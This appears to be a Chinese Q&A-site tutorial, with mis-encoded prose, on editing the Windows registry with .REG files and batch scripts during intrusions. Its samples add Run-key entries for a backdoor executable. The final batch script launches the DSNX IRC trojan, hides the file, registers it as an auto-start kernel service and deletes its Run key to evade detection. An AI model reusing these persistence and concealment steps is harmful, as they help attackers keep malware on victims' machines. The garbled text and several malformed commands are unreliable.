å¨å
¥ä¾µè¿ç¨ä¸ç»å¸¸åæä½æ³¨å表çç¹å®çé®å¼æ¥å®ç°ä¸å®çç®çï¼ä¾å¦:为äºè¾¾å°éèåé¨ãæ¨é©¬ç¨åºèå é¤Runä¸æ®ä½çé®å¼ãæè
å建ä¸ä¸ªæå¡ç¨ä»¥å è½½åé¨ãå½ç¶æ们ä¹ä¼ä¿®æ¹æ³¨å表æ¥å åºç³»ç»æè
æ¹åç³»ç»çæ个å±æ§ï¼è¿äºé½éè¦æ们对注å表æä½æä¸å®çäºè§£ãä¸é¢æ们就å
å¦ä¹ ä¸ä¸å¦ä½ä½¿ç¨.REGæ件æ¥æä½æ³¨å表.(æ们å¯ä»¥ç¨æ¹å¤çæ¥çæä¸ä¸ªREGæ件)
å
³äºæ³¨å表çæä½ï¼å¸¸è§çæ¯å建ãä¿®æ¹ãå é¤ã
1.å建
å建å为两ç§ï¼ä¸ç§æ¯å建å项(Subkey)
æ们å建ä¸ä¸ªæ件ï¼å
容å¦ä¸ï¼
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/hacker]
ç¶åæ§è¡è¯¥èæ¬ï¼ä½ 就已ç»å¨HKEY_LOCAL_MACHINE/SOFTWARE/Microsoftä¸å建äºä¸ä¸ªåå为âhackerâçå项ã
å¦ä¸ç§æ¯å建ä¸ä¸ªé¡¹ç®å称
é£è¿ç§æä»¶æ ¼å¼å°±æ¯å
¸åçæä»¶æ ¼å¼ï¼åä½ ä»æ³¨å表ä¸å¯¼åºçæä»¶æ ¼å¼ä¸è´ï¼å
容å¦ä¸ï¼
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]
"Invader"="Ex4rch"
"Door"=C://WINNT//system32//door.exe
"Autodos"=dword:02
è¿æ ·å°±å¨[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]ä¸
æ°å»ºäº:Invaderãdoorãaboutè¿ä¸ä¸ªé¡¹ç®
Invaderçç±»åæ¯âString Valueâ
doorçç±»åæ¯âREG SZ Valueâ
Autodosçç±»åæ¯âDWORD Valueâ
2.ä¿®æ¹
ä¿®æ¹ç¸å¯¹æ¥è¯´æ¯è¾ç®åï¼åªè¦æä½ éè¦ä¿®æ¹ç项ç®å¯¼åºï¼ç¶åç¨è®°äºæ¬è¿è¡ä¿®æ¹ï¼ç¶å导å
¥ï¼regedit /sï¼å³å¯ã
3.å é¤
æ们é¦å
æ¥è¯´è¯´å é¤ä¸ä¸ªé¡¹ç®å称ï¼æ们å建ä¸ä¸ªå¦ä¸çæ件ï¼
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]
"Ex4rch"=-
æ§è¡è¯¥èæ¬ï¼[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]ä¸ç"Ex4rch"就被å é¤äºï¼
æ们åççå é¤ä¸ä¸ªå项ï¼æ们å建ä¸ä¸ªå¦ä¸çèæ¬ï¼
Windows Registry Editor Version 5.00
[-HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]
æ§è¡è¯¥èæ¬ï¼[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]就已ç»è¢«å é¤äºã
ç¸ä¿¡çå°è¿éï¼.regæä»¶ä½ åºæ¬å·²ç»ææ¡äºãé£ä¹ç°å¨çç®æ å°±æ¯ç¨æ¹å¤çæ¥å建ç¹å®å
容ç.regæ件äºï¼è®°å¾æ们åé¢è¯´éçå©ç¨éå®å符å·å¯ä»¥å¾å®¹æå°å建ç¹å®ç±»åçæ件ã
samlpe1:å¦ä¸é¢çé£ä¸ªä¾å,å¦æ³çæå¦ä¸æ³¨å表æ件
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]
"Invader"="Ex4rch"
"door"=hex:255
"Autodos"=dword:000000128
åªéè¦è¿æ ·ï¼
@echo Windows Registry Editor Version 5.00>>Sample.reg
@echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]>Sample.reg
@echo "Invader"="Ex4rch">>Sample.reg
@echo "door"=5>>C://WINNT//system32//door.exe>>Sample.reg
@echo "Autodos"=dword:02>>Sample.reg
samlpe2:
æ们ç°å¨å¨ä½¿ç¨ä¸äºæ¯è¾èçæ¨é©¬æ¶,å¯è½ä¼å¨æ³¨å表ç[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run(RunonceãRunservicesãRunexec)]ä¸çæä¸ä¸ªé®å¼ç¨æ¥å®ç°æ¨é©¬çèªå¯å¨.ä½æ¯è¿æ ·å¾å®¹ææ´é²æ¨é©¬ç¨åºçè·¯å¾,ä»è导è´æ¨é©¬è¢«æ¥æ,ç¸å¯¹å°è¥æ¯å°æ¨é©¬ç¨åºæ³¨å为系ç»æå¡åç¸å¯¹å®å
¨ä¸äº.ä¸é¢ä»¥é
置好å°IRCæ¨é©¬DSNX为ä¾(å为windrv32.exe)
@start windrv32.exe
@attrib +h +r windrv32.exe
@echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run] >>patch.dll
@echo "windsnx "=- >>patch.dll
@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:/winnt/system32/windrv32.exe
@regedit /s patch.dll
@delete patch.dll
@REM [å é¤DSNXDEå¨æ³¨å表ä¸çå¯å¨é¡¹ï¼ç¨sc.exeå°ä¹æ³¨å为系ç»å
³é®æ§æå¡çåæ¶å°å
¶å±æ§è®¾ä¸ºéèååªè¯»ï¼å¹¶config为èªå¯å¨]
@REM è¿æ ·ä¸æ¯æ´å®å
¨^_^.
温馨提示:答案为网友推荐,仅供参考